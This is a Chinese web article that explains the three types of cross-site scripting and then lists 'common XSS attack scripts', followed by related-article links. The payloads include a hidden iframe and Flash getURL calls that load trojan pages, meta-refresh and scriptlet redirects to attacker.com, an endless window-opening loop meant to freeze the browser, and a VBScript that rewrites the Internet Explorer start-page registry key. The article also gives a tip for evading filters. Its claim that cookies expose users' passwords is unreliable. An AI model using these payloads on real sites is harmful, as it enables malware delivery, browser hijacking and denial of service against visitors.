XSS攻擊常識(shí)及常用腳本

一、什么是XSS?
XSS全稱是Cross Site Scripting即跨站腳本,當(dāng)目標(biāo)網(wǎng)站目標(biāo)用戶瀏覽器渲染HTML文檔的過程中,出現(xiàn)了不被預(yù)期的腳本指令并執(zhí)行時(shí),XSS就發(fā)生了。
二、XSS分類
XSS有三類:反射型XSS(非持久型)、存儲(chǔ)型XSS(持久型)和DOM XSS
反射型XSS
發(fā)出請(qǐng)求時(shí),XSS代碼出現(xiàn)在URL中,作為輸入提交到服務(wù)器端,服務(wù)器端解析后響應(yīng),XSS代碼隨響應(yīng)內(nèi)容一起傳回給瀏覽器,最后瀏覽器解析執(zhí)行XSS代碼。這個(gè)過程像一次反射,故叫反射型XSS。
存儲(chǔ)型XSS
存儲(chǔ)型XSS和反射型XSS的差別僅在于,提交的代碼會(huì)存儲(chǔ)在服務(wù)器端(數(shù)據(jù)庫,內(nèi)存,文件系統(tǒng)等),下次請(qǐng)求目標(biāo)頁面時(shí)不用再提交XSS代碼
最典型的例子是留言板XSS,用戶提交一條包含XSS代碼的留言存儲(chǔ)到數(shù)據(jù)庫,目標(biāo)用戶查看留言板時(shí),那些留言的內(nèi)容會(huì)從數(shù)據(jù)庫查詢出來并顯示,瀏覽器發(fā)現(xiàn)有XSS代碼,就當(dāng)做正常的HTML與Js解析執(zhí)行,于是觸發(fā)了XSS攻擊。
DOM XSS
DOM XSS和反射型XSS、存儲(chǔ)型XSS的差別在于DOM XSS的代碼并不需要服務(wù)器參與,觸發(fā)XSS靠的是瀏覽器端的DOM解析,完全是客戶端的事情。
附常見的XSS攻擊方法
1、這個(gè)應(yīng)該都知道
<script>alert("test")</script> 常用于測(cè)試 是否存在跨站
2、<script>window.alert(document.cookie);</script>
這句代碼將會(huì)彈出壹個(gè)包含有瀏覽者cookie信息的對(duì)話框,如果用戶已經(jīng)通過帳號(hào)登陸網(wǎng)站,在顯示的cookie信息中將會(huì)包含有用戶的賬戶名和密碼。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當(dāng)用戶瀏覽該 頁時(shí),將彈出壹個(gè)高爲(wèi)200,寬爲(wèi)200的網(wǎng)頁窗口,在其中打開的頁面是http://www.pete.cn/default.asp
4、跨站攻擊的形式是多樣的,不僅可以在網(wǎng)頁中插入跨站腳本代碼,而且可以在flash文件中插入跨站腳本代碼,實(shí)現(xiàn)跨站攻擊。由于flash文件有較高 的安全性,用戶通常對(duì)flash文件的警惕性不夠,因此用flash文件進(jìn)行跨站攻擊的成功率很高。如果將這個(gè)含有跨站腳本代碼的flash文件插入到網(wǎng) 頁中,例如制作成網(wǎng)頁banner或者廣告,那么中招的用戶將更多。
flash跨站是通過在flash文件中插入動(dòng)作腳本來實(shí)現(xiàn)的,通過在flash文件“幀”的“動(dòng)作”中插入跨站腳本代碼來實(shí)現(xiàn)跨站攻擊,其實(shí)現(xiàn)方法入下:
首先運(yùn)行flash文件制作工具flash8.exe,新建壹個(gè)空白的flash文檔。然后選中其中的第壹幀,進(jìn)入界面下方的“動(dòng)作”編輯界面,在Action Script中插入我們的跨站腳本代碼
getURL("http://網(wǎng)頁木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說中的框架 - - 膜拜吧 還有JS 也可以使用,比框架更隱蔽
6、Refresh到另壹個(gè)頁面:
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
7、scriptlet引入另壹個(gè)頁面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
下面來幾段長(zhǎng)的 但是 記住 要慎用 ??!
1、打開無數(shù)個(gè)瀏覽器窗口,直至CPU超負(fù)荷,非關(guān)機(jī)不可:
<script language="JavaScript"> <!-- while (true) { window.open("URI"); //如果URI就是當(dāng)前頁本身,那就更具破壞性。 } //--> </script>
2、 修改注冊(cè)表(IE 主頁):
<script language="VBScript"> Set RegWsh = CreateObject("WScript.Shell") '設(shè)置IE瀏覽器默認(rèn)頁 RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com" </script>
有時(shí)候,</script> 可以替換大小寫 來躲過過濾
我最后要說的壹句話就是“害人終害己”,切記!
到此這篇關(guān)于XSS攻擊常識(shí)及常用腳本 的文章就介紹到這了,更多相關(guān)XSS 攻擊腳本 內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持腳本之家!
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell,小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語句(完整版)
這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對(duì)于目前流行的sql注入,程序員在編寫程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會(huì)自動(dòng)的記錄下你的IP地址,提交的非法參數(shù)和動(dòng)作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個(gè)小彈窗,其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲(chǔ)、DOM這三類2016-12-27Python 爬蟲使用動(dòng)態(tài)切換ip防止封殺
這篇文章主要介紹了Python 爬蟲使用動(dòng)態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08使用爬蟲采集網(wǎng)站時(shí),解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲采集網(wǎng)站時(shí),解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08